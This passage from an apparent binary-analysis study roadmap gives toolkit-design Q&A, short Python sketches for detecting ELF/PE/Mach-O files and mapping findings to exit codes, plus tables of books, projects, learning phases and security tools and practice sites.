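  1. Q: How would you auto-detect the binary format (ELF vs PE vs Mach-O)? A: Read the first few bytes (magic numbers): ELF starts with \x7fELF; PE starts with MZ (the DOS header), with the PE\0\0 signature at the offset stored in e_lfanew (file offset 0x3c); Mach-O starts with 0xfeedface (32-bit) or 0xfeedfacf (64-bit), which appear byte-swapped (\xce\xfa\xed\xfe, \xcf\xfa\xed\xfe) in little-endian files. Implement a dispatcher that picks the parser from the magic, falling back to trying each parser in sequence.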

  2. Q: Your ROP gadget finder is too slow. How do you optimize it? A: Instead of regex on disassembly text, search raw bytes for instruction patterns. Use a sliding window over executable sections. Cache results. Parallelize across sections. Consider using an existing library like ROPgadget or ropper.

  3. Q: How do you test your tool against malicious/malformed binaries without compromising security? A: Run tests in Docker containers or VMs. Use fuzzing to generate malformed inputs. Include known-bad binaries (malware samples) in test suite. Implement timeout mechanisms for analysis that hangs.
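
The magic-number dispatch from question 1 above, as a minimal sketch. The function name and the returned labels are hypothetical; fat (universal) Mach-O files are left out because their 0xcafebabe magic collides with Java class files and needs an extra check.

```python
"""Sketch: detect ELF, PE, and thin Mach-O files from their magic numbers."""
import struct

MACHO_MAGICS = {
    bytes.fromhex("feedface"), bytes.fromhex("cefaedfe"),  # 32-bit, big/little endian
    bytes.fromhex("feedfacf"), bytes.fromhex("cffaedfe"),  # 64-bit, big/little endian
}


def detect_format(data: bytes) -> str:
    """Return "ELF", "PE", "Mach-O", "MZ", or "unknown"."""
    if data[:4] == b"\x7fELF":
        return "ELF"
    if data[:4] in MACHO_MAGICS:
        return "Mach-O"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        # e_lfanew (4 bytes at offset 0x3c) points to the "PE\0\0" signature.
        (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
        if data[pe_offset:pe_offset + 4] == b"PE\0\0":
            return "PE"
        return "MZ"  # DOS executable without a PE header
    return "unknown"
```

Only the first 64 bytes plus the four bytes at `e_lfanew` are inspected, so the check stays cheap even for very large files read through a memory map.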

Tool Integration:

  1. Q: Should your tool reimplement disassembly or use Capstone/LLVM? A: Use existing libraries like Capstone for disassembly: it’s battle-tested, supports multiple architectures, and is well-maintained. Focus your effort on higher-level analysis, not reinventing wheels.

  2. Q: How would you integrate your tool with CI/CD pipelines for automated binary analysis? A: Support JSON output for machine parsing. Provide exit codes indicating severity (0=no vulns, 1=low, 2=high, etc.). Allow configuration via files (.binkit.yml). Generate reports in standard formats (SARIF, JSON).
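
The exit-code convention from the CI/CD answer above can be a one-line mapping. The 0/1/2 values follow that answer; the `critical` level and the function name are assumptions added for illustration.

```python
"""Sketch: derive a process exit code from the worst finding severity."""
import sys

# 0 = no findings, 1 = low, 2 = high; "critical" = 3 is an added assumption.
EXIT_CODES = {"low": 1, "high": 2, "critical": 3}


def exit_code(severities):
    """Return the exit code of the worst severity, or 0 for no findings."""
    return max((EXIT_CODES[s] for s in severities), default=0)


if __name__ == "__main__":
    # In a real CLI the list would come from the analysis results.
    sys.exit(exit_code(["low", "high"]))
```

A pipeline step can then fail the build with a plain shell test on the exit status, for example treating any value of 2 or more as blocking.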

User Experience:

  1. Q: A user reports your tool crashes on a specific binary. How do you debug? A: Ask for the binary sample (if shareable). Add verbose logging (--debug flag). Wrap risky operations in try/except with detailed error messages. Create a minimal reproduction case and add to test suite.

  2. Q: How do you make your complex tool approachable for beginners? A: Provide sensible defaults (just run binkit binary.elf). Include a tutorial/quickstart. Generate helpful error messages. Add --examples flag showing common use cases. Create comprehensive documentation with screenshots.

Books That Will Help

| Topic | Book | Chapters | Why It Helps |
| --- | --- | --- | --- |
| Software Architecture | “Clean Architecture” by Robert C. Martin | Ch 15-22: Architecture, Components | Learn how to structure a large system into maintainable, testable modules |
| CLI Design | “The Art of UNIX Programming” by Eric S. Raymond | Ch 10-11: CLI Design, Interfaces | Design command-line tools that feel natural and compose well with other tools |
| Binary Analysis Foundation | “Practical Binary Analysis” by Dennis Andriesse | Ch 1-9: All chapters | Comprehensive guide to everything your toolkit needs to do; this is your blueprint |
| Testing Strategy | “The Art of Software Testing” by Glenford Myers | Ch 2-5: Test Design, Techniques | Learn how to test your binary parser and analysis engine thoroughly |
| Python Best Practices | “Fluent Python” by Luciano Ramalho | Ch 5-7: Classes, Objects, Functions | Write clean, Pythonic code for your toolkit: proper OOP, generators, decorators |
| Vulnerability Detection | “The Art of Software Security Assessment” by Dowd, McDonald, Schuh | Ch 7-8: Program Analysis | Understand what vulnerabilities look like and how to detect them programmatically |
| ROP and Exploitation | “The Shellcoder’s Handbook” by Anley et al. | Ch 7: Return-Oriented Programming | Learn ROP fundamentals to build your gadget finder and chain constructor |
| Disassembly Deep Dive | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Programming | Understand instruction encoding for disassembler integration |
| File Format Specs | “Practical Binary Analysis” by Dennis Andriesse | Ch 2-3: ELF Format, PE Format | Reference for parsing binary formats correctly |
| Tool Development | “Beautiful Code” by Oram & Wilson | Ch 2, 9, 17: Various tool chapters | Learn from examples of well-designed analysis tools and libraries |
| Project Organization | “The Pragmatic Programmer” by Hunt & Thomas | Ch 1-2: Pragmatic Philosophy, Approach | Best practices for organizing and evolving a large codebase |
| Error Handling | “Release It!” by Michael Nygard | Ch 4-5: Stability Patterns | Learn how to make your tool robust against malformed inputs and edge cases |


Project Comparison Table

| # | Project | Difficulty | Time | Key Skill | Fun |
| --- | --- | --- | --- | --- | --- |
| 1 | ELF Parser | ⭐⭐ | 1-2 weeks | File Formats | ⭐⭐⭐ |
| 2 | PE Parser | ⭐⭐ | 1-2 weeks | Windows Formats | ⭐⭐⭐ |
| 3 | Disassembler | ⭐⭐⭐ | 2-4 weeks | Instruction Encoding | ⭐⭐⭐⭐ |
| 4 | GDB Deep Dive | ⭐⭐ | 1-2 weeks | Debugging | ⭐⭐⭐⭐ |
| 5 | Ghidra RE | ⭐⭐ | 2-3 weeks | Static Analysis | ⭐⭐⭐⭐ |
| 6 | Crackmes | ⭐⭐ | 2-4 weeks | Reverse Engineering | ⭐⭐⭐⭐⭐ |
| 7 | Buffer Overflow | ⭐⭐⭐ | 3-4 weeks | Exploitation | ⭐⭐⭐⭐⭐ |
| 8 | ROP Chains | ⭐⭐⭐⭐ | 2-3 weeks | Advanced Exploitation | ⭐⭐⭐⭐⭐ |
| 9 | strace/ltrace | ⭐ | 3-5 days | Dynamic Analysis | ⭐⭐⭐ |
| 10 | Malware Lab | ⭐⭐⭐ | 4-6 weeks | Malware Analysis | ⭐⭐⭐⭐⭐ |
| 11 | angr | ⭐⭐⭐⭐ | 2-3 weeks | Symbolic Execution | ⭐⭐⭐⭐ |
| 12 | Fuzzing | ⭐⭐⭐ | 2-3 weeks | Vulnerability Discovery | ⭐⭐⭐⭐ |
| 13 | Binary Diffing | ⭐⭐ | 1-2 weeks | Patch Analysis | ⭐⭐⭐ |
| 14 | Anti-Debug Bypass | ⭐⭐⭐ | 2-3 weeks | Anti-Analysis | ⭐⭐⭐⭐ |
| 15 | Decompiler | ⭐⭐⭐⭐⭐ | 2-3 months | Code Recovery | ⭐⭐⭐⭐ |
| 16 | CTF Practice | ⭐⭐⭐ | Ongoing | Competition Skills | ⭐⭐⭐⭐⭐ |
| 17 | radare2 Mastery | ⭐⭐ | 2-3 weeks | CLI Tools | ⭐⭐⭐⭐ |
| 18 | Complete Toolkit | ⭐⭐⭐⭐⭐ | 2-3 months | Integration | ⭐⭐⭐⭐ |

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

  1. Project 1: ELF Parser - Understand Linux binaries
  2. Project 2: PE Parser - Understand Windows binaries
  3. Project 4: GDB Deep Dive - Master debugging
  4. Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

  1. Project 5: Ghidra RE - Static analysis
  2. Project 17: radare2 Mastery - CLI analysis
  3. Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

  1. Project 7: Buffer Overflow - Basic exploitation
  2. Project 8: ROP Chains - Bypass protections
  3. Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

  1. Project 10: Malware Lab - Real-world analysis
  2. Project 11: angr - Automated analysis
  3. Project 12: Fuzzing - Vulnerability discovery
  4. Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

  1. Project 3: Disassembler - Deep instruction knowledge
  2. Project 13: Binary Diffing - Patch analysis
  3. Project 15: Decompiler - Code recovery
  4. Project 18: Complete Toolkit - Professional tools

Summary

| # | Project | Main Language |
| --- | --- | --- |
| 1 | ELF File Parser | C |
| 2 | PE File Parser | C |
| 3 | Build a Disassembler | C |
| 4 | GDB Debugging Deep Dive | GDB/Python |
| 5 | Ghidra Reverse Engineering | Ghidra/Java |
| 6 | Crackme Challenges | Assembly/Python |
| 7 | Buffer Overflow Exploitation | C/Python |
| 8 | Return-Oriented Programming | Python |
| 9 | Dynamic Analysis (strace/ltrace) | Shell |
| 10 | Malware Analysis Lab | Assembly/Python |
| 11 | Symbolic Execution (angr) | Python |
| 12 | Fuzzing with AFL++ | C/Shell |
| 13 | Binary Diffing | Python |
| 14 | Anti-Debugging Bypass | Assembly/Python |
| 15 | Build a Decompiler | Python |
| 16 | CTF Binary Exploitation | Python |
| 17 | radare2 Mastery | r2/Python |
| 18 | Complete Binary Analysis Toolkit | Python |

Resources

Essential Books

  • “Practical Binary Analysis” by Dennis Andriesse - Best overall introduction
  • “Hacking: The Art of Exploitation” by Jon Erickson - Classic exploitation book
  • “Practical Malware Analysis” by Sikorski & Honig - Malware-focused
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - In-depth RE
  • “The Shellcoder’s Handbook” - Advanced exploitation

Tools

  • Ghidra: https://ghidra-sre.org/ - Free decompiler
  • radare2: https://rada.re/ - Open source RE framework
  • pwntools: https://docs.pwntools.com/ - Exploit development
  • angr: https://angr.io/ - Binary analysis framework
  • AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

  • pwnable.kr: https://pwnable.kr/ - CTF challenges
  • crackmes.one: https://crackmes.one/ - Reverse engineering
  • ROP Emporium: https://ropemporium.com/ - ROP practice
  • Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs

Reference Materials


Total Estimated Time: 8-12 months of dedicated study

After completion: You’ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.